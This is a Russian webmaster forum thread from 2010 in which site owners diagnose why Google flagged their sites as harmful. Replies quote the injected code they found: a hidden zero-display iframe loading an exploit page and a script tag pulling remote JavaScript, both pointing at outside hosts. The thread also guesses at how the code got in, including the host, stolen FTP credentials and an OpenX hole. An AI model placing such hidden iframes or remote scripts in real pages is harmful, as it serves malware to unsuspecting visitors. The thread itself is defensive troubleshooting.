Масовое обнаружение вредоносных кодов на сайтах

name-k
На сайте с 05.02.2010
Offline
57
4246

По нескольким проектам сегодня около полуночи получил письма из вебмастерки Google, что на сайтах якобы обнаружены вредоносные коды.

Что странно:

-сайты не хакали 100%

-из скриптов только JQuerry

-пишет что

Теперь пользователям, переходящим на эти страницы по ссылкам в результатах поиска Google.ru, отображается страница с предупреждением

Хотя сайты в зонах *.ua

Первое, что пришло в голово - массовая рассылка от Google в связи с очередным сбоем. Но! Сайты блокированы, в серпе есть коварная надпись по тайтлом

Этот сайт может нанести вред Вашему компьютеру.

Интересует масовый ли это сбой(т.к. у меня по двум разным проектам, на разных движках и серваках)?

И стоит сразу писать в саппорт или подождать помилования?

Куплю украинские аккаунты AdSense. Стучитесь в ЛС.
F
На сайте с 19.08.2010
Offline
2
#1

+1

17-18 числа мои сайты тоже под этим статусом.

jptech(тчк)ru

Firzex добавил 19.08.2010 в 10:54

Может это просто совпадение?

Уважаемые знатоки, прошу вас подсказать, за что могли наказать сайт

jptech(тчк)ru и toto.jptech(тчк)ru

??

Fr3d
На сайте с 29.05.2008
Offline
86
#2

name-k, скинь с личку хоть один сайт, посмотрю.

не думаю что массовый глюк.

Fr3d добавил 19.08.2010 в 11:38

Firzex:
jptech(тчк)ru и toto.jptech(тчк)ru

в конце станицы сплойт

<iframe ykssy='aQ6Bawxm' src='http://vipoffer4you.com/in.cgi?7 ' width='617' height='213' style='display:none'></iframe>

Webmoney кредиты - это WMCoin.ru (http://wmcoin.ru)
F
На сайте с 19.08.2010
Offline
2
#3
Fr3d:
name-kв конце станицы сплойт
<iframe ykssy='aQ6Bawxm' src='http://vipoffer4you.com/in.cgi?7 ' width='617' height='213' style='display:none'></iframe>

Как этот код мог оказаться на странице? Антивирус всегда работает.

name-k
На сайте с 05.02.2010
Offline
57
#4

Проблема была в хостинге(http://timeweb.ru/), сейчас переписываемся с их ТП. Не смогли обнаружить проблему сразу т.к. вредоносный скрипт переодически исчезал и появлялся в коде наших сайтов, которые лежат на Timeweb.

name-k, скинь с личку хоть один сайт, посмотрю

в личку скинул скрин самого кода

TM
На сайте с 28.10.2008
Offline
70
#5

Мож через соседний сайт на сервере? Хотя учитывая свои фильтры на sweb.ru (то есть принимая во внимание их отношения к безопасности) думаю сервера они настраивают правильно (разграничение прав). Выходит только более возможный вариант - это все же вирус. Мож поменяйте антивирус? Вы какой юзаете?

F
На сайте с 19.08.2010
Offline
2
#6
t-m-p:
Мож через соседний сайт на сервере? Хотя учитывая свои фильтры на sweb.ru (то есть принимая во внимание их отношения к безопасности) думаю сервера они настраивают правильно (разграничение прав). Выходит только более возможный вариант - это все же вирус. Мож поменяйте антивирус? Вы какой юзаете?

КИС.

Т.е. вы предполагаете что вирус пробрался ко мне в комп, стырил ключи от фтп менеджера, пробрался на сайт и редактировал страницы(причем не все)?

G
На сайте с 10.08.2007
Offline
34
#7

OpenX стоял? Сплойтили через одну мало известную дырку.

F
На сайте с 19.08.2010
Offline
2
#8
Gebbels:
OpenX стоял? Сплойтили через одну мало известную дырку.

никаких инородных модулей, темболее рекламы не было.

кроме флеш видео плеера, который стоит и сейчас.

Helen27
На сайте с 30.05.2009
Offline
171
#9

У меня пару дней назад такое было.

Гугл заблокировал два сайта.

При проверке, вирус обнаружила на главных пяти

сайтов ( в том числе 2 заблок) с одного аккаунта на хосте.

Вот этот скрипт: <script type="text/javascript" src="http://riotassistance.ru/Access.js"></script>

<!--064cedf1a3cd7d9e06bf94ce15f0b28d--></body></html>

Причём, "вредителю" 8 дней от роду.

Проверила хост - не закрыт аноним доступа по ФТР, думаю - в этом причина.

***

TM
На сайте с 28.10.2008
Offline
70
#10
Firzex:
КИС.
Т.е. вы предполагаете что вирус пробрался ко мне в комп, стырил ключи от фтп менеджера, пробрался на сайт и редактировал страницы(причем не все)?

Хм.. кис вроде надежный. Но вариантов размещения ифрейма довольно много и с помощью вирусов - тоже ). Так что предполагать можно много чего, не исключая и того что сказала Helen27. А вирусу достаточно отправить пасс от фтп хозяину. В общем - убрали ифрейм, теперь понаблюдайте что да как будет :)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий